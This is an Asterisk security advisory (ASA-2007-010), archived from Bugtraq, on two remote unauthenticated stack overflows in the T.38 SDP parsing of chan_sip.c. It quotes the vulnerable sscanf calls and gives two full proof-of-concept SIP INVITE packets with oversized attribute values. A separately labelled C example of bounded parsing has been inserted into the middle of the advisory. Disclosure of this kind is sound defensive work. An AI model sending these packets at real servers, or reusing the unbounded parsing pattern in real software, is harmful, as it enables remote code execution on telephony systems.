Bugtraq mailing list archives
ASA-2007-010: Two stack buffer overflows in SIP channel's T.38 SDP parsing code
From: "Kevin P. Fleming" <kpfleming () digium com>
Date: Wed, 25 Apr 2007 14:04:11 -0500
Asterisk Project Security Advisory - ASA-2007-010
+------------------------------------------------------------------------+
| Product | Asterisk |
|--------------------+---------------------------------------------------|
| Summary | Two stack buffer overflows in SIP channel's T.38 |
| | SDP parsing code |
|--------------------+---------------------------------------------------|
| Nature of Advisory | Exploitable Stack Buffer Overflow |
|--------------------+---------------------------------------------------|
| Susceptibility | Remote Unauthenticated Sessions |
|--------------------+---------------------------------------------------|
| Severity | Moderate |
|--------------------+---------------------------------------------------|
| Exploits Known | No |
|--------------------+---------------------------------------------------|
| Reported On | March 22, 2007 |
|--------------------+---------------------------------------------------|
| Reported By | Barrie Dempster, NGS Software, |
| | <barrie () ngssoftware com> |
|--------------------+---------------------------------------------------|
| Posted On | April 24, 2007 |
|--------------------+---------------------------------------------------|
| Last Updated On | April 24, 2007 |
|--------------------+---------------------------------------------------|
| Advisory Contact | kpfleming () digium com |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------------------+
|Description|Two closely related stack-based buffer overflows exist in the SIP/SDP |
| |handler of Asterisk. The two vulnerabilities are very similar but are |
| |two separate unsafe function calls: overly long values for the |
| |T38FaxRateManagement and T38FaxUdpEC SDP attributes can each be |
| |exploited remotely, without authentication, to execute arbitrary code. |
| |For either overflow to be reachable, T.38 fax over SIP must be enabled |
| |in sip.conf. Example SIP INVITE packets are shown below; however, these |
| |vulnerabilities can be triggered by a number of different SIP messages |
| |carrying SDP, both in calls received by Asterisk and in responses to |
| |calls made by Asterisk. |
| | |
| |Remote Unauthenticated stack overflow in Asterisk SIP/SDP |
| |T38FaxRateManagement parameter |
| | |
| |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
| |Asterisk. By sending a SIP packet whose SDP includes an overly long |
| |T38FaxRateManagement value it is possible to overflow a stack-based |
| |buffer and execute arbitrary code. |
| | |
| |The process_sdp function of chan_sip.c in Asterisk contains the |
| |following vulnerable call to sscanf: |
| | |
| |  else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) { |
| |      found = 1; |
| |      if (option_debug > 2) |
| |          ast_log(LOG_DEBUG, "RateMangement: %s\n", s); |
| |      if (!strcasecmp(s, "localTCF")) |
| |          peert38capability |= T38FAX_RATE_MANAGEMENT_LOCAL_TCF; |
| |      else if (!strcasecmp(s, "transferredTCF")) |
| |          peert38capability |= T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF; |
| | |
| |This attempts to read the "T38FaxRateManagement:" attribute from the SDP|
| |within a SIP packet and copy the string that follows it into "s". The |
| |"%s" conversion has no field width, so nothing limits the length of that|
| |string and the copy can run past the end of "s", overwriting adjacent |
| |memory on the stack. "s" is defined earlier in this function as a |
| |character array of only 256 bytes. The following example packet |
| |demonstrates an overflow of this parameter: |
| | |
| |INVITE sip:200@127.0.0.1 SIP/2.0 |
| |Date: Wed, 21 Mar 2007 4:20:09 GMT |
| |CSeq: 1 INVITE |
| |Via: SIP/2.0/UDP 10.0.0.123:5068 |
| |  ;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport |
| |User-Agent: NGS/2.0 |
| |From: "Barrie Dempster" |
| |  <sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
| |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades |
| |To: <sip:200@localhost> |
| |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp> |
| |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE |
| |Content-Type: application/sdp |
| |Content-Length: 796 |
| |Max-Forwards: 70 |
| | |
| |v=0 |
| |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 |
| |s=- |
| |c=IN IP4 127.0.0.1 |
| |t=0 0 |
| |m=image 5004 UDPTL t38 |
| |a=T38FaxVersion:0 |
| |a=T38MaxBitRate:14400 |
| |a=T38FaxMaxBuffer:1024 |
| |a=T38FaxMaxDatagram:238 |
| |a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAA |
| |a=T38FaxUdpEC:t38UDPRedundancy |
| | |
| |(The Via and From headers are folded onto continuation lines as SIP |
| |allows; the a=T38FaxRateManagement line is a single SDP line, wrapped |
| |here only for display.) |
| | |
| |------------------------------------------------- |
| | |
| |Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC |
| |parameter |
| | |
| |A remote unauthenticated stack overflow exists in the SIP/SDP handler of|
| |Asterisk. By sending a SIP packet whose SDP includes an overly long |
| |T38FaxUdpEC value it is possible to overflow a stack-based buffer and |
| |execute arbitrary code. |
| | |
| |The process_sdp function of chan_sip.c in Asterisk contains the |
| |following vulnerable call to sscanf: |
| | |
| |  else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) { |
| |      found = 1; |
| |      if (option_debug > 2) |
| |          ast_log(LOG_DEBUG, "UDP EC: %s\n", s); |
| |      if (!strcasecmp(s, "t38UDPRedundancy")) { |
| |          peert38capability |= T38FAX_UDP_EC_REDUNDANCY; |
| |          ast_udptl_set_error_correction_scheme(p->udptl, |
| |              UDPTL_ERROR_CORRECTION_REDUNDANCY); |
| | |
| |This attempts to read the "T38FaxUdpEC:" attribute from the SDP within a|
| |SIP packet and copy the string that follows it into "s". As above, the |
| |"%s" conversion has no field width, so nothing limits the length of that|
| |string and the copy can run past the end of "s", overwriting adjacent |
| |memory on the stack. "s" is the same 256-byte character array defined |
| |earlier in this function. The following example packet demonstrates an |
| |overflow of this parameter: |
| | |
| |INVITE sip:200@127.0.0.1 SIP/2.0 |
| |Date: Wed, 21 Mar 2007 4:20:09 GMT |
| |CSeq: 1 INVITE |
| |Via: SIP/2.0/UDP 10.0.0.123:5068 |
| |  ;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport |
| |User-Agent: NGS/2.0 |
| |From: "Barrie Dempster" |
| |  <sip:zeedo@10.0.0.123:5068>;tag=de92d852-2dd6-db11-9d02-000b7d0dc672 |
| |Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades |
| |To: <sip:200@localhost> |
| |Contact: <sip:zeedo@10.0.0.123:5068;transport=udp> |
| |Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE |
| |Content-Type: application/sdp |
| |Content-Length: 796 |
| |Max-Forwards: 70 |
| | |
| |v=0 |
| |o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1 |
| |s=- |
| |c=IN IP4 127.0.0.1 |
| |t=0 0 |
| |m=image 5004 UDPTL t38 |
| |a=T38FaxVersion:0 |
| |a=T38MaxBitRate:14400 |
| |a=T38FaxMaxBuffer:1024 |
| |a=T38FaxMaxDatagram:238 |
| |a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
| |AAAAAAAAA |
| | |
| |(The Via and From headers are folded onto continuation lines as SIP |
| |allows; the a=T38FaxUdpEC line is a single SDP line, wrapped here only |
| |for display.) |
+------------------------------------------------------------------------------------+
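The unsafe sscanf pattern quoted above for both attributes, placed next to a bounded form of the same parse, as an added example in C. This is not Asterisk's code and not the project's own fix; the T38_* flag names, parse_t38_attr(), result_for(), caps_for() and probe_oversized() are assumptions made for illustration, and the probe input is constructed here to resemble the advisory's test packet. Only the 256-byte buffer and the two attribute names come from the advisory.

```c
/*
 * Added example (not Asterisk's code): the unbounded sscanf("%s") pattern
 * that ASA-2007-010 describes, next to a bounded version of the same
 * parse. The T38_* flag names, parse_t38_attr() and the helper functions
 * are this example's own assumptions; the 256-byte buffer and the two
 * attribute names are the ones quoted in the advisory.
 */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define T38_VALUE_MAX 255          /* s[] is T38_VALUE_MAX + 1 = 256 bytes */
#define STR_(x) #x
#define STR(x) STR_(x)             /* 255 -> "255" inside a format string */

enum t38_caps {
    T38_RATE_MANAGEMENT_LOCAL_TCF       = 1u << 0,
    T38_RATE_MANAGEMENT_TRANSFERRED_TCF = 1u << 1,
    T38_UDP_EC_REDUNDANCY               = 1u << 2,
    T38_UDP_EC_FEC                      = 1u << 3
};

enum t38_parse {
    T38_OK = 0,            /* recognised attribute and value, flag set */
    T38_NOT_T38 = 1,       /* not one of the two attributes handled here */
    T38_TOO_LONG = 2,      /* value exceeds the buffer: rejected, not truncated */
    T38_UNKNOWN_VALUE = 3  /* attribute matched but value is not a known token */
};

/*
 * The vulnerable pattern from process_sdp(), reproduced for comparison
 * and deliberately never called:
 *
 *     char s[256];
 *     else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) { ...
 *
 * "%s" without a field width copies every byte up to the next whitespace,
 * so a value longer than 255 bytes writes past the end of s on the stack.
 */

/*
 * Bounded version. 'a' is one SDP attribute body (the text after "a=").
 * Two things make it safe:
 *   1. "%255s" caps the copy at T38_VALUE_MAX bytes plus the NUL, which
 *      is why the array is declared one byte larger than the width.
 *   2. "%n" records where scanning stopped; if the next byte is neither
 *      end-of-string nor whitespace, the value was longer than the buffer
 *      and is rejected instead of being silently truncated and compared.
 */
int parse_t38_attr(const char *a, unsigned int *caps)
{
    char s[T38_VALUE_MAX + 1];
    int end = 0;

    if (sscanf(a, "T38FaxRateManagement:%" STR(T38_VALUE_MAX) "s%n", s, &end) == 1) {
        if (a[end] != '\0' && !isspace((unsigned char)a[end]))
            return T38_TOO_LONG;
        if (strcasecmp(s, "localTCF") == 0) {
            *caps |= T38_RATE_MANAGEMENT_LOCAL_TCF;
            return T38_OK;
        }
        if (strcasecmp(s, "transferredTCF") == 0) {
            *caps |= T38_RATE_MANAGEMENT_TRANSFERRED_TCF;
            return T38_OK;
        }
        return T38_UNKNOWN_VALUE;
    }

    end = 0;
    if (sscanf(a, "T38FaxUdpEC:%" STR(T38_VALUE_MAX) "s%n", s, &end) == 1) {
        if (a[end] != '\0' && !isspace((unsigned char)a[end]))
            return T38_TOO_LONG;
        if (strcasecmp(s, "t38UDPRedundancy") == 0) {
            *caps |= T38_UDP_EC_REDUNDANCY;
            return T38_OK;
        }
        if (strcasecmp(s, "t38UDPFEC") == 0) {
            *caps |= T38_UDP_EC_FEC;
            return T38_OK;
        }
        return T38_UNKNOWN_VALUE;
    }

    return T38_NOT_T38;
}

/* Parse one attribute and return only the result code. */
int result_for(const char *a)
{
    unsigned int caps = 0;
    return parse_t38_attr(a, &caps);
}

/* Parse one attribute and return the flags it set (0 unless T38_OK). */
unsigned int caps_for(const char *a)
{
    unsigned int caps = 0;
    return parse_t38_attr(a, &caps) == T38_OK ? caps : 0;
}

/*
 * Constructed input in the shape of the advisory's test packet:
 * "T38FaxUdpEC:" followed by n bytes of 'A'. Returns the parse result.
 */
int probe_oversized(size_t n)
{
    static const char prefix[] = "T38FaxUdpEC:";
    char line[1024];

    if (n > sizeof(line) - sizeof(prefix))
        return -1;
    memcpy(line, prefix, sizeof(prefix) - 1);
    memset(line + sizeof(prefix) - 1, 'A', n);
    line[sizeof(prefix) - 1 + n] = '\0';
    return result_for(line);
}

int main(void)
{
    printf("t38UDPRedundancy -> rc=%d caps=%#x\n",
           result_for("T38FaxUdpEC:t38UDPRedundancy"),
           caps_for("T38FaxUdpEC:t38UDPRedundancy"));
    printf("255 x 'A'        -> rc=%d (fits, unknown token)\n", probe_oversized(255));
    printf("256 x 'A'        -> rc=%d (rejected, too long)\n", probe_oversized(256));
    printf("512 x 'A'        -> rc=%d (rejected, too long)\n", probe_oversized(512));
    return 0;
}
```

A field width alone ("%255s") is enough to stop the stack write, but on its own it silently truncates an oversized value and then compares the truncated prefix against the known tokens; the "%n" check turns that into an explicit rejection, which is the behaviour a parser of untrusted signalling should have. Note also that sscanf field widths count bytes before the terminating NUL, so the width must be one less than the array size.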
+------------------------------------------------------------------------+
| Resolution | T.38 support in the affected versions of Asterisk is not |
| | enabled by default, therefore the severity of this issue |
| | is 'moderate'. |
| | |
| | Users who are using the default configuration with |
| | 't38_udptl' set to 'no' or an equivalent value are not |
| | susceptible to this vulnerability. Users who have set |
| | this configuration item to 'yes' or an equivalent value |
| | but are not actually using T.38 support can set it to |
| | 'no' to secure their systems against this vulnerability. |
| | |
| | All other users are urged to upgrade to the appropriate |
| | version of their Asterisk product listed in the |
| | 'Corrected In' section below. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.0.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.2.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Open Source | 1.4.x | all releases prior to |
| | | 1.4.3 |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | A.x.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| Asterisk Business Edition | B.x.x | not affected, does not |
| | | contain T.38 support |
|------------------------------+-------------+---------------------------|
| AsteriskNOW | pre-release | all releases prior to and |
| | | including Beta 5 |
|------------------------------+-------------+---------------------------|
| Asterisk Appliance Developer | 0.x.x | all releases prior to |
| Kit | | 0.4.0 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|--------------------+---------------------------------------------------|
| Asterisk Open | 1.4.3, available from |
| Source | ftp://ftp.digium.com/pub/telephony/asterisk |
|--------------------+---------------------------------------------------|
| AsteriskNOW | Beta 6, when available from |
| | http://www.asterisknow.org; Beta 5 users can use |
| | 'System Update' in the appliance control panel to |
| | update their version of AsteriskNOW |
|--------------------+---------------------------------------------------|
| Asterisk Appliance | 0.4.0, available from |
| Developer Kit | ftp://ftp.digium.com/pub/telephony/aadk |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Links | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
| http://www.asterisk.org/security. |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
| http://www.asterisk.org/files/ASA-2007-010.pdf. |
+------------------------------------------------------------------------+
Copyright (c) 2007 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.